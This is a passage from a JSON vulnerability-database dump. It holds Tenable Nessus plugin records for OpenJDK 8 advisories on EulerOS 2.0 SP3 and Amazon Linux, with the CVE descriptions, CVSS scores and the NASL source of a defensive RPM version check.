of Oracle Java SE (component: Libraries). Supported\n versions that are affected are Java SE: 7u271, 8u261,\n 11.0.8 and 15 Java SE Embedded: 8u261. Difficult to\n exploit vulnerability allows unauthenticated attacker\n with network access via multiple protocols to\n compromise Java SE, Java SE Embedded. Successful\n attacks of this vulnerability can result in\n unauthorized update, insert or delete access to some of\n Java SE, Java SE Embedded accessible data. Note:\n Applies to client and server deployment of Java. This\n vulnerability can be exploited through sandboxed Java\n Web Start applications and sandboxed Java applets. It\n can also be exploited by supplying data to APIs in the\n specified Component without using sandboxed Java Web\n Start applications or sandboxed Java applets, such as\n through a web service.(CVE-2020-14782)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: Libraries). Supported\n versions that are affected are Java SE: 7u271, 8u261,\n 11.0.8 and 15 Java SE Embedded: 8u261. Difficult to\n exploit vulnerability allows unauthenticated attacker\n with network access via multiple protocols to\n compromise Java SE, Java SE Embedded. Successful\n attacks require human interaction from a person other\n than the attacker. Successful attacks of this\n vulnerability can result in unauthorized read access to\n a subset of Java SE, Java SE Embedded accessible data.\n Note: This vulnerability applies to Java deployments,\n typically in clients running sandboxed Java Web Start\n applications or sandboxed Java applets, that load and\n run untrusted code (e.g., code that comes from the\n internet) and rely on the Java sandbox for security.\n This vulnerability does not apply to Java deployments,\n typically in servers, that load and run only trusted\n code (e.g., code installed by an\n administrator).(CVE-2020-14796)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: Libraries). Supported\n versions that are affected are Java SE: 7u271, 8u261,\n 11.0.8 and 15 Java SE Embedded: 8u261. Difficult to\n exploit vulnerability allows unauthenticated attacker\n with network access via multiple protocols to\n compromise Java SE, Java SE Embedded. Successful\n attacks of this vulnerability can result in\n unauthorized update, insert or delete access to some of\n Java SE, Java SE Embedded accessible data. Note:\n Applies to client and server deployment of Java. This\n vulnerability can be exploited through sandboxed Java\n Web Start applications and sandboxed Java applets. It\n can also be exploited by supplying data to APIs in the\n specified Component without using sandboxed Java Web\n Start applications or sandboxed Java applets, such as\n through a web service.(CVE-2020-14797)\n\n - Vulnerability in the Java SE product of Oracle Java SE\n (component: Libraries). Supported versions that are\n affected are Java SE: 11.0.8 and 15. Easily exploitable\n vulnerability allows unauthenticated attacker with\n network access via multiple protocols to compromise\n Java SE. Successful attacks of this vulnerability can\n result in unauthorized read access to a subset of Java\n SE accessible data. Note: This vulnerability applies to\n Java deployments, typically in clients running\n sandboxed Java Web Start applications or sandboxed Java\n applets, that load and run untrusted code (e.g., code\n that comes from the internet) and rely on the Java\n sandbox for security. This vulnerability does not apply\n to Java deployments, typically in servers, that load\n and run only trusted code (e.g., code installed by an\n administrator).(CVE-2020-14803)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: Scripting). Supported\n versions that are affected are Java SE: 8u241, 11.0.6\n and 14 Java SE Embedded: 8u241. Difficult to exploit\n vulnerability allows unauthenticated attacker with\n network access via multiple protocols to compromise\n Java SE, Java SE Embedded. Successful attacks of this\n vulnerability can result in unauthorized ability to\n cause a partial denial of service (partial DOS) of Java\n SE, Java SE Embedded.(CVE-2020-2754)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: Scripting). Supported\n versions that are affected are Java SE: 8u241, 11.0.6\n and 14 Java SE Embedded: 8u241. Difficult to exploit\n vulnerability allows unauthenticated attacker with\n network access via multiple protocols to compromise\n Java SE, Java SE Embedded. Successful attacks of this\n vulnerability can result in unauthorized ability to\n cause a partial denial of service (partial DOS) of Java\n SE, Java SE Embedded.(CVE-2020-2755)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: Serialization). Supported\n versions that are affected are Java SE: 7u251, 8u241,\n 11.0.6 and 14 Java SE Embedded: 8u241. Difficult to\n exploit vulnerability allows unauthenticated attacker\n with network access via multiple protocols to\n compromise Java SE, Java SE Embedded. Successful\n attacks of this vulnerability can result in\n unauthorized ability to cause a partial denial of\n service (partial DOS) of Java SE, Java SE\n Embedded.(CVE-2020-2756)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: Serialization). Supported\n versions that are affected are Java SE: 7u251, 8u241,\n 11.0.6 and 14 Java SE Embedded: 8u241. Difficult to\n exploit vulnerability allows unauthenticated attacker\n with network access via multiple protocols to\n compromise Java SE, Java SE Embedded. Successful\n attacks of this vulnerability can result in\n unauthorized ability to cause a partial denial of\n service (partial DOS) of Java SE, Java SE\n Embedded.(CVE-2020-2757)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: Security). Supported\n versions that are affected are Java SE: 7u251, 8u241,\n 11.0.6 and 14 Java SE Embedded: 8u241. Difficult to\n exploit vulnerability allows unauthenticated attacker\n with network access via multiple protocols to\n compromise Java SE, Java SE Embedded. Successful\n attacks of this vulnerability can result in\n unauthorized ability to cause a partial denial of\n service (partial DOS) of Java SE, Java SE\n Embedded.(CVE-2020-2773)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: JSSE). Supported versions\n that are affected are Java SE: 7u251, 8u241, 11.0.6 and\n 14 Java SE Embedded: 8u241. Easily exploitable\n vulnerability allows unauthenticated attacker with\n network access via HTTPS to compromise Java SE, Java SE\n Embedded. Successful attacks of this vulnerability can\n result in unauthorized ability to cause a partial\n denial of service (partial DOS) of Java SE, Java SE\n Embedded.(CVE-2020-2781)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: Lightweight HTTP Server).\n Supported versions that are affected are Java SE:\n 7u251, 8u241, 11.0.6 and 14 Java SE Embedded: 8u241.\n Difficult to exploit vulnerability allows\n unauthenticated attacker with network access via\n multiple protocols to compromise Java SE, Java SE\n Embedded. Successful attacks of this vulnerability can\n result in unauthorized update, insert or delete access\n to some of Java SE, Java SE Embedded accessible data as\n well as unauthorized read access to a subset of Java\n SE, Java SE Embedded accessible data.(CVE-2020-2800)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: Concurrency). Supported\n versions that are affected are Java SE: 7u251, 8u241,\n 11.0.6 and 14 Java SE Embedded: 8u241. Easily\n exploitable vulnerability allows unauthenticated\n attacker with network access via multiple protocols to\n compromise Java SE, Java SE Embedded. Successful\n attacks of this vulnerability can result in\n unauthorized ability to cause a partial denial of\n service (partial DOS) of Java SE, Java SE\n Embedded.(CVE-2020-2830)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: 2D). Supported versions\n that are affected are Java SE: 8u251, 11.0.7 and 14.0.1\n Java SE Embedded: 8u251. Difficult to exploit\n vulnerability allows unauthenticated attacker with\n network access via multiple protocols to compromise\n Java SE, Java SE Embedded. Successful attacks of this\n vulnerability can result in unauthorized read access to\n a subset of Java SE, Java SE Embedded accessible\n data.(CVE-2020-14581)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 2, "cvss3": {"score": 4.8, "vector": "AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N"}, "published": "2021-01-20T00:00:00", "title": "EulerOS 2.0 SP3 : java-1.8.0-openjdk (EulerOS-SA-2021-1078)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-2830", "CVE-2020-14803", "CVE-2020-14782", "CVE-2020-2781", "CVE-2020-2755", "CVE-2020-2800", "CVE-2020-2757", "CVE-2020-14792", "CVE-2020-14781", "CVE-2020-14798", "CVE-2020-14779", "CVE-2020-14797", "CVE-2020-2773", "CVE-2020-14796", "CVE-2020-2756", "CVE-2020-14581", "CVE-2020-2754"], "modified": "2021-01-20T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:java-1.8.0-openjdk", "p-cpe:/a:huawei:euleros:java-1.8.0-openjdk-headless", "p-cpe:/a:huawei:euleros:java-1.8.0-openjdk-devel", "cpe:/o:huawei:euleros:2.0"], "id": "EULEROS_SA-2021-1078.NASL", "href": "https://www.tenable.com/plugins/nessus/145111", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(145111);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/22\");\n\n script_cve_id(\n \"CVE-2020-14581\",\n \"CVE-2020-14779\",\n \"CVE-2020-14781\",\n \"CVE-2020-14782\",\n \"CVE-2020-14792\",\n \"CVE-2020-14796\",\n \"CVE-2020-14797\",\n \"CVE-2020-14798\",\n \"CVE-2020-14803\",\n \"CVE-2020-2754\",\n \"CVE-2020-2755\",\n \"CVE-2020-2756\",\n \"CVE-2020-2757\",\n \"CVE-2020-2773\",\n \"CVE-2020-2781\",\n \"CVE-2020-2800\",\n \"CVE-2020-2830\"\n );\n\n script_name(english:\"EulerOS 2.0 SP3 : java-1.8.0-openjdk (EulerOS-SA-2021-1078)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the java-1.8.0-openjdk packages\ninstalled, the EulerOS installation on the remote host is affected by\nthe following vulnerabilities :\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: Serialization). Supported\n versions that are affected are Java SE: 7u271, 8u261,\n 11.0.8 and 15 Java SE Embedded: 8u261. Difficult to\n exploit vulnerability allows unauthenticated attacker\n with network access via multiple protocols to\n compromise Java SE, Java SE Embedded. Successful\n attacks of this vulnerability can result in\n unauthorized ability to cause a partial denial of\n service (partial DOS) of Java SE, Java SE Embedded.\n Note: Applies to client and server deployment of Java.\n This vulnerability can be exploited through sandboxed\n Java Web Start applications and sandboxed Java applets.\n It can also be exploited by supplying data to APIs in\n the specified Component without using sandboxed Java\n Web Start applications or sandboxed Java applets, such\n as through a web service.(CVE-2020-14779)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: JNDI). Supported versions\n that are affected are Java SE: 7u271, 8u261, 11.0.8 and\n 15 Java SE Embedded: 8u261. Difficult to exploit\n vulnerability allows unauthenticated attacker with\n network access via multiple protocols to compromise\n Java SE, Java SE Embedded. Successful attacks of this\n vulnerability can result in unauthorized read access to\n a subset of Java SE, Java SE Embedded accessible data.\n Note: Applies to client and server deployment of Java.\n This vulnerability can be exploited through sandboxed\n Java Web Start applications and sandboxed Java applets.\n It can also be exploited by supplying data to APIs in\n the specified Component without using sandboxed Java\n Web Start applications or sandboxed Java applets, such\n as through a web service.(CVE-2020-14781)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: Hotspot). Supported\n versions that are affected are Java SE: 7u271, 8u261,\n 11.0.8 and 15 Java SE Embedded: 8u261. Difficult to\n exploit vulnerability allows unauthenticated attacker\n with network access via multiple protocols to\n compromise Java SE, Java SE Embedded. Successful\n attacks require human interaction from a person other\n than the attacker. Successful attacks of this\n vulnerability can result in unauthorized update, insert\n or delete access to some of Java SE, Java SE Embedded\n accessible data as well as unauthorized read access to\n a subset of Java SE, Java SE Embedded accessible data.\n Note: Applies to client and server deployment of Java.\n This vulnerability can be exploited through sandboxed\n Java Web Start applications and sandboxed Java applets.\n It can also be exploited by supplying data to APIs in\n the specified Component without using sandboxed Java\n Web Start applications or sandboxed Java applets, such\n as through a web service.(CVE-2020-14792)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: Libraries). Supported\n versions that are affected are Java SE: 7u271, 8u261,\n 11.0.8 and 15 Java SE Embedded: 8u261. Difficult to\n exploit vulnerability allows unauthenticated attacker\n with network access via multiple protocols to\n compromise Java SE, Java SE Embedded. Successful\n attacks require human interaction from a person other\n than the attacker. Successful attacks of this\n vulnerability can result in unauthorized update, insert\n or delete access to some of Java SE, Java SE Embedded\n accessible data. Note: This vulnerability applies to\n Java deployments, typically in clients running\n sandboxed Java Web Start applications or sandboxed Java\n applets, that load and run untrusted code (e.g., code\n that comes from the internet) and rely on the Java\n sandbox for security. This vulnerability does not apply\n to Java deployments, typically in servers, that load\n and run only trusted code (e.g., code installed by an\n administrator).(CVE-2020-14798)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: Libraries). Supported\n versions that are affected are Java SE: 7u271, 8u261,\n 11.0.8 and 15 Java SE Embedded: 8u261. Difficult to\n exploit vulnerability allows unauthenticated attacker\n with network access via multiple protocols to\n compromise Java SE, Java SE Embedded. Successful\n attacks of this vulnerability can result in\n unauthorized update, insert or delete access to some of\n Java SE, Java SE Embedded accessible data. Note:\n Applies to client and server deployment of Java. This\n vulnerability can be exploited through sandboxed Java\n Web Start applications and sandboxed Java applets. It\n can also be exploited by supplying data to APIs in the\n specified Component without using sandboxed Java Web\n Start applications or sandboxed Java applets, such as\n through a web service.(CVE-2020-14782)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: Libraries). Supported\n versions that are affected are Java SE: 7u271, 8u261,\n 11.0.8 and 15 Java SE Embedded: 8u261. Difficult to\n exploit vulnerability allows unauthenticated attacker\n with network access via multiple protocols to\n compromise Java SE, Java SE Embedded. Successful\n attacks require human interaction from a person other\n than the attacker. Successful attacks of this\n vulnerability can result in unauthorized read access to\n a subset of Java SE, Java SE Embedded accessible data.\n Note: This vulnerability applies to Java deployments,\n typically in clients running sandboxed Java Web Start\n applications or sandboxed Java applets, that load and\n run untrusted code (e.g., code that comes from the\n internet) and rely on the Java sandbox for security.\n This vulnerability does not apply to Java deployments,\n typically in servers, that load and run only trusted\n code (e.g., code installed by an\n administrator).(CVE-2020-14796)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: Libraries). Supported\n versions that are affected are Java SE: 7u271, 8u261,\n 11.0.8 and 15 Java SE Embedded: 8u261. Difficult to\n exploit vulnerability allows unauthenticated attacker\n with network access via multiple protocols to\n compromise Java SE, Java SE Embedded. Successful\n attacks of this vulnerability can result in\n unauthorized update, insert or delete access to some of\n Java SE, Java SE Embedded accessible data. Note:\n Applies to client and server deployment of Java. This\n vulnerability can be exploited through sandboxed Java\n Web Start applications and sandboxed Java applets. It\n can also be exploited by supplying data to APIs in the\n specified Component without using sandboxed Java Web\n Start applications or sandboxed Java applets, such as\n through a web service.(CVE-2020-14797)\n\n - Vulnerability in the Java SE product of Oracle Java SE\n (component: Libraries). Supported versions that are\n affected are Java SE: 11.0.8 and 15. Easily exploitable\n vulnerability allows unauthenticated attacker with\n network access via multiple protocols to compromise\n Java SE. Successful attacks of this vulnerability can\n result in unauthorized read access to a subset of Java\n SE accessible data. Note: This vulnerability applies to\n Java deployments, typically in clients running\n sandboxed Java Web Start applications or sandboxed Java\n applets, that load and run untrusted code (e.g., code\n that comes from the internet) and rely on the Java\n sandbox for security. This vulnerability does not apply\n to Java deployments, typically in servers, that load\n and run only trusted code (e.g., code installed by an\n administrator).(CVE-2020-14803)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: Scripting). Supported\n versions that are affected are Java SE: 8u241, 11.0.6\n and 14 Java SE Embedded: 8u241. Difficult to exploit\n vulnerability allows unauthenticated attacker with\n network access via multiple protocols to compromise\n Java SE, Java SE Embedded. Successful attacks of this\n vulnerability can result in unauthorized ability to\n cause a partial denial of service (partial DOS) of Java\n SE, Java SE Embedded.(CVE-2020-2754)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: Scripting). Supported\n versions that are affected are Java SE: 8u241, 11.0.6\n and 14 Java SE Embedded: 8u241. Difficult to exploit\n vulnerability allows unauthenticated attacker with\n network access via multiple protocols to compromise\n Java SE, Java SE Embedded. Successful attacks of this\n vulnerability can result in unauthorized ability to\n cause a partial denial of service (partial DOS) of Java\n SE, Java SE Embedded.(CVE-2020-2755)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: Serialization). Supported\n versions that are affected are Java SE: 7u251, 8u241,\n 11.0.6 and 14 Java SE Embedded: 8u241. Difficult to\n exploit vulnerability allows unauthenticated attacker\n with network access via multiple protocols to\n compromise Java SE, Java SE Embedded. Successful\n attacks of this vulnerability can result in\n unauthorized ability to cause a partial denial of\n service (partial DOS) of Java SE, Java SE\n Embedded.(CVE-2020-2756)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: Serialization). Supported\n versions that are affected are Java SE: 7u251, 8u241,\n 11.0.6 and 14 Java SE Embedded: 8u241. Difficult to\n exploit vulnerability allows unauthenticated attacker\n with network access via multiple protocols to\n compromise Java SE, Java SE Embedded. Successful\n attacks of this vulnerability can result in\n unauthorized ability to cause a partial denial of\n service (partial DOS) of Java SE, Java SE\n Embedded.(CVE-2020-2757)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: Security). Supported\n versions that are affected are Java SE: 7u251, 8u241,\n 11.0.6 and 14 Java SE Embedded: 8u241. Difficult to\n exploit vulnerability allows unauthenticated attacker\n with network access via multiple protocols to\n compromise Java SE, Java SE Embedded. Successful\n attacks of this vulnerability can result in\n unauthorized ability to cause a partial denial of\n service (partial DOS) of Java SE, Java SE\n Embedded.(CVE-2020-2773)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: JSSE). Supported versions\n that are affected are Java SE: 7u251, 8u241, 11.0.6 and\n 14 Java SE Embedded: 8u241. Easily exploitable\n vulnerability allows unauthenticated attacker with\n network access via HTTPS to compromise Java SE, Java SE\n Embedded. Successful attacks of this vulnerability can\n result in unauthorized ability to cause a partial\n denial of service (partial DOS) of Java SE, Java SE\n Embedded.(CVE-2020-2781)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: Lightweight HTTP Server).\n Supported versions that are affected are Java SE:\n 7u251, 8u241, 11.0.6 and 14 Java SE Embedded: 8u241.\n Difficult to exploit vulnerability allows\n unauthenticated attacker with network access via\n multiple protocols to compromise Java SE, Java SE\n Embedded. Successful attacks of this vulnerability can\n result in unauthorized update, insert or delete access\n to some of Java SE, Java SE Embedded accessible data as\n well as unauthorized read access to a subset of Java\n SE, Java SE Embedded accessible data.(CVE-2020-2800)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: Concurrency). Supported\n versions that are affected are Java SE: 7u251, 8u241,\n 11.0.6 and 14 Java SE Embedded: 8u241. Easily\n exploitable vulnerability allows unauthenticated\n attacker with network access via multiple protocols to\n compromise Java SE, Java SE Embedded. Successful\n attacks of this vulnerability can result in\n unauthorized ability to cause a partial denial of\n service (partial DOS) of Java SE, Java SE\n Embedded.(CVE-2020-2830)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: 2D). Supported versions\n that are affected are Java SE: 8u251, 11.0.7 and 14.0.1\n Java SE Embedded: 8u251. Difficult to exploit\n vulnerability allows unauthenticated attacker with\n network access via multiple protocols to compromise\n Java SE, Java SE Embedded. Successful attacks of this\n vulnerability can result in unauthorized read access to\n a subset of Java SE, Java SE Embedded accessible\n data.(CVE-2020-14581)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2021-1078\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?cc613330\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected java-1.8.0-openjdk packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/01/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/01/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:java-1.8.0-openjdk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:java-1.8.0-openjdk-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:java-1.8.0-openjdk-headless\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(3)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP3\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP3\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"java-1.8.0-openjdk-1.8.0.191.b12-0.h13\",\n \"java-1.8.0-openjdk-devel-1.8.0.191.b12-0.h13\",\n \"java-1.8.0-openjdk-headless-1.8.0.191.b12-0.h13\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"3\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"java-1.8.0-openjdk\");\n}\n", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2021-01-17T09:21:33", "description": "The version of java-1.8.0-openjdk installed on the remote host is prior to 1.8.0.272.b10-1.56. It is, therefore,\naffected by multiple vulnerabilities as referenced in the ALAS-2021-1460 advisory.\n\n - Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Serialization).\n Supported versions that are affected are Java SE: 7u271, 8u261, 11.0.8 and 15; Java SE Embedded: 8u261.\n Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple\n protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in\n unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded.\n Note: Applies to client and server deployment of Java. This vulnerability can be exploited through\n sandboxed Java Web Start applications and sandboxed Java applets. It can also be exploited by supplying\n data to APIs in the specified Component without using sandboxed Java Web Start applications or sandboxed\n Java applets, such as through a web service. CVSS 3.1 Base Score 3.7 (Availability impacts). CVSS Vector:\n (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L). (CVE-2020-14779)\n\n - Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: JNDI). Supported\n versions that are affected are Java SE: 7u271, 8u261, 11.0.8 and 15; Java SE Embedded: 8u261. Difficult to\n exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to\n compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized\n read access to a subset of Java SE, Java SE Embedded accessible data. Note: Applies to client and server\n deployment of Java. This vulnerability can be exploited through sandboxed Java Web Start applications and\n sandboxed Java applets. It can also be exploited by supplying data to APIs in the specified Component\n without using sandboxed Java Web Start applications or sandboxed Java applets, such as through a web\n service. CVSS 3.1 Base Score 3.7 (Confidentiality impacts). CVSS Vector:\n (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N). (CVE-2020-14781)\n\n - Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Libraries). Supported\n versions that are affected are Java SE: 7u271, 8u261, 11.0.8 and 15; Java SE Embedded: 8u261. Difficult to\n exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to\n compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized\n update, insert or delete access to some of Java SE, Java SE Embedded accessible data. Note: Applies to\n client and server deployment of Java. This vulnerability can be exploited through sandboxed Java Web Start\n applications and sandboxed Java applets. It can also be exploited by supplying data to APIs in the\n specified Component without using sandboxed Java Web Start applications or sandboxed Java applets, such as\n through a web service. CVSS 3.1 Base Score 3.7 (Integrity impacts). CVSS Vector:\n (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N). (CVE-2020-14782, CVE-2020-14797)\n\n - Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Hotspot). Supported\n versions that are affected are Java SE: 7u271, 8u261, 11.0.8 and 15; Java SE Embedded: 8u261. Difficult to\n exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to\n compromise Java SE, Java SE Embedded. Successful attacks require human interaction from a person other\n than the attacker. Successful attacks of this vulnerability can result in unauthorized update, insert or\n delete access to some of Java SE, Java SE Embedded accessible data as well as unauthorized read access to\n a subset of Java SE, Java SE Embedded accessible data. Note: Applies to client and server deployment of\n Java. This vulnerability can be exploited through sandboxed Java Web Start applications and sandboxed Java\n applets. It can also be exploited by supplying data to APIs in the specified Component without using\n sandboxed Java Web Start applications or sandboxed Java applets, such as through a web service. CVSS 3.1\n Base Score 4.2 (Confidentiality and Integrity impacts). CVSS Vector:\n (CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:N). (CVE-2020-14792)\n\n - Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Libraries). Supported\n versions that are affected are Java SE: 7u271, 8u261, 11.0.8 and 15; Java SE Embedded: 8u261. Difficult to\n exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to\n compromise Java SE, Java SE Embedded. Successful attacks require human interaction from a person other\n than the attacker. Successful attacks of this vulnerability can result in unauthorized read access to a\n subset of Java SE, Java SE Embedded accessible data. Note: This vulnerability applies to Java deployments,\n typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load\n and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for\n security. This vulnerability does not apply to Java deployments, typically in servers, that load and run\n only trusted code (e.g., code installed by an administrator). CVSS 3.1 Base Score 3.1 (Confidentiality\n impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N). (CVE-2020-14796)\n\n - Vulnerability in the Java SE product of Oracle Java SE (component: Libraries). Supported versions that are\n affected are Java SE: 11.0.8 and 15. Easily exploitable vulnerability allows unauthenticated attacker with\n network access via multiple protocols to compromise Java SE. Successful attacks of this vulnerability can\n result in unauthorized read access to a subset of Java SE accessible data. Note: This vulnerability\n applies to Java deployments, typically in clients running sandboxed Java Web Start applications or\n sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and\n rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in\n servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.1 Base\n Score 5.3 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N).\n (CVE-2020-14803)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.", "edition": 1, "cvss3": {"score": 4.2, "vector": "AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:N"}, "published": "2021-01-14T00:00:00", "title": "Amazon Linux AMI : java-1.8.0-openjdk (ALAS-2021-1460)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-14803", "CVE-2020-14782", "CVE-2020-14792", "CVE-2020-14781", "CVE-2020-14779", "CVE-2020-14797", "CVE-2020-14796"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:java-1.8.0-openjdk-headless", "p-cpe:/a:amazon:linux:java-1.8.0-openjdk", "p-cpe:/a:amazon:linux:java-1.8.0-openjdk-devel", 